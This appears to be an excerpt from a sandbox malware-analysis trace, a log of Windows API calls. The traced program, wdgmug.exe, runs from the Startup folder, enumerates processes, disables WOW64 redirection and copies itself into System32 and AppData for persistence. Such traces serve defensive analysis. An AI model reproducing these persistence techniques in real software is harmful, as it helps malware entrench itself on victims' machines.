cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0279.678] lstrlenW (lpString="System") returned 6 [0279.678] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0279.678] lstrlenW (lpString="smss.exe") returned 8 [0279.678] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.679] lstrlenW (lpString="csrss.exe") returned 9 [0279.679] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0279.680] lstrlenW (lpString="wininit.exe") returned 11 [0279.680] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.680] lstrlenW (lpString="csrss.exe") returned 9 [0279.681] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0279.681] lstrlenW (lpString="winlogon.exe") returned 12 [0279.681] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0279.682] lstrlenW (lpString="services.exe") returned 12 [0279.682] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0279.682] lstrlenW (lpString="lsass.exe") returned 9 [0279.682] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0279.683] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0279.683] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0279.683] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0279.683] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.684] lstrlenW (lpString="svchost.exe") returned 11 [0279.684] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.684] lstrlenW (lpString="svchost.exe") returned 11 [0279.685] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0279.689] lstrlenW (lpString="dwm.exe") returned 7 [0279.689] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.689] lstrlenW (lpString="svchost.exe") returned 11 [0279.689] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.690] lstrlenW (lpString="svchost.exe") returned 11 [0279.690] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.690] lstrlenW (lpString="svchost.exe") returned 11 [0279.691] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.691] lstrlenW (lpString="svchost.exe") returned 11 [0279.691] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.692] lstrlenW (lpString="svchost.exe") returned 11 [0279.692] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.692] lstrlenW (lpString="svchost.exe") returned 11 [0279.692] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.693] lstrlenW (lpString="svchost.exe") returned 11 [0279.693] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.693] lstrlenW (lpString="svchost.exe") returned 11 [0279.694] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.694] lstrlenW (lpString="svchost.exe") returned 11 [0279.694] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.695] lstrlenW (lpString="svchost.exe") returned 11 [0279.695] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0279.695] lstrlenW (lpString="spoolsv.exe") returned 11 [0279.695] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.696] lstrlenW (lpString="svchost.exe") returned 11 [0279.696] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0279.696] lstrlenW (lpString="audiodg.exe") returned 11 [0279.696] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0279.697] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0279.697] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0279.697] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0279.697] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0279.698] lstrlenW (lpString="Memory Compression") returned 18 [0279.698] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0279.699] lstrlenW (lpString="taskhostw.exe") returned 13 [0279.699] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0279.699] lstrlenW (lpString="sihost.exe") returned 10 [0279.699] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.700] lstrlenW (lpString="svchost.exe") returned 11 [0279.700] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0279.701] lstrlenW (lpString="MDMAgent.exe") returned 12 [0279.701] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0279.701] lstrlenW (lpString="taskhostw.exe") returned 13 [0279.701] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0279.702] lstrlenW (lpString="explorer.exe") returned 12 [0279.702] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0279.702] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0279.702] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0279.703] lstrlenW (lpString="SearchUI.exe") returned 12 [0279.703] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0279.703] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0279.703] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.704] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0279.704] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0279.705] lstrlenW (lpString="dllhost.exe") returned 11 [0279.705] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0279.706] lstrlenW (lpString="mobsync.exe") returned 11 [0279.706] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0279.706] lstrlenW (lpString="wdgmug.exe") returned 10 [0279.706] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 0 [0279.707] CloseHandle (hObject=0x240) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4877d8 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487a18 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486430 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486450 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485610 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3300 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486410 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4860d0 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada48 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada70 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486230 | out: hHeap=0x470000) returned 1 [0279.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adbd8 | out: hHeap=0x470000) returned 1 [0279.708] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4b6f70 [0279.708] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4c6f78 [0279.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b33d8 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b33d8, Size=0x20) returned 0x4ad9a8 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9a8, Size=0x40) returned 0x4878b0 [0279.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3210 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3210, Size=0x20) returned 0x4adac0 [0279.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3240 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3240, Size=0x20) returned 0x4ad980 [0279.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3198 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3198, Size=0x20) returned 0x4adcf0 [0279.709] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adcf0, Size=0x40) returned 0x487748 [0279.709] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c6f78, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe")) returned 0x47 [0279.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4d6f80 [0279.710] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4e6f88 [0279.710] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3300 [0279.710] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3300, Size=0x20) returned 0x4adc28 [0279.710] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc28, Size=0x40) returned 0x487790 [0279.710] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487790, Size=0x80) returned 0x4b39c8 [0279.710] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b39c8 [0279.710] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.710] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.710] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\wdgmug.exe", lpDst=0x4d6f80, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\wdgmug.exe") returned 0x1f [0279.711] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6f88 | out: hHeap=0x470000) returned 1 [0279.711] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d6f80 | out: hHeap=0x470000) returned 1 [0279.712] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x2391020 [0279.715] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3270 [0279.715] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3270, Size=0x20) returned 0x4ad8b8 [0279.715] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3408 [0279.715] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3408, Size=0x20) returned 0x4ad908 [0279.716] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.716] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.716] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x0) returned 1 [0279.716] lstrlenW (lpString="kernel32.dll") returned 12 [0279.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad8b8 | out: hHeap=0x470000) returned 1 [0279.716] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad908 | out: hHeap=0x470000) returned 1 [0279.716] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0279.716] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\wdgmug.exe" (normalized: "c:\\windows\\system32\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0279.719] CloseHandle (hObject=0x240) returned 1 [0279.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3210 [0279.719] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3210, Size=0x20) returned 0x4adb88 [0279.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b32d0 [0279.719] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b32d0, Size=0x20) returned 0x4adcf0 [0279.719] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.719] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.719] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.720] lstrlenW (lpString="kernel32.dll") returned 12 [0279.720] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adcf0 | out: hHeap=0x470000) returned 1 [0279.720] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.720] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb88 | out: hHeap=0x470000) returned 1 [0279.720] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2391020 | out: hHeap=0x470000) returned 1 [0279.723] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4d6f80 [0279.724] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4e6f88 [0279.724] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3348 [0279.724] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3348, Size=0x20) returned 0x4ad9d0 [0279.724] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad9d0, Size=0x40) returned 0x487790 [0279.724] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487790, Size=0x80) returned 0x4b39c8 [0279.724] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b39c8 [0279.724] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.724] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.724] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\wdgmug.exe", lpDst=0x4d6f80, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe") returned 0x2b [0279.724] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6f88 | out: hHeap=0x470000) returned 1 [0279.724] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d6f80 | out: hHeap=0x470000) returned 1 [0279.725] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x2394020 [0279.729] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3288 [0279.729] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3288, Size=0x20) returned 0x4adc28 [0279.729] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3210 [0279.729] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3210, Size=0x20) returned 0x4ad8b8 [0279.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.729] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.729] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.729] lstrlenW (lpString="kernel32.dll") returned 12 [0279.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adc28 | out: hHeap=0x470000) returned 1 [0279.729] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad8b8 | out: hHeap=0x470000) returned 1 [0279.729] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0279.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0279.731] ReadFile (in: hFile=0x240, lpBuffer=0x2394020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2394020*, 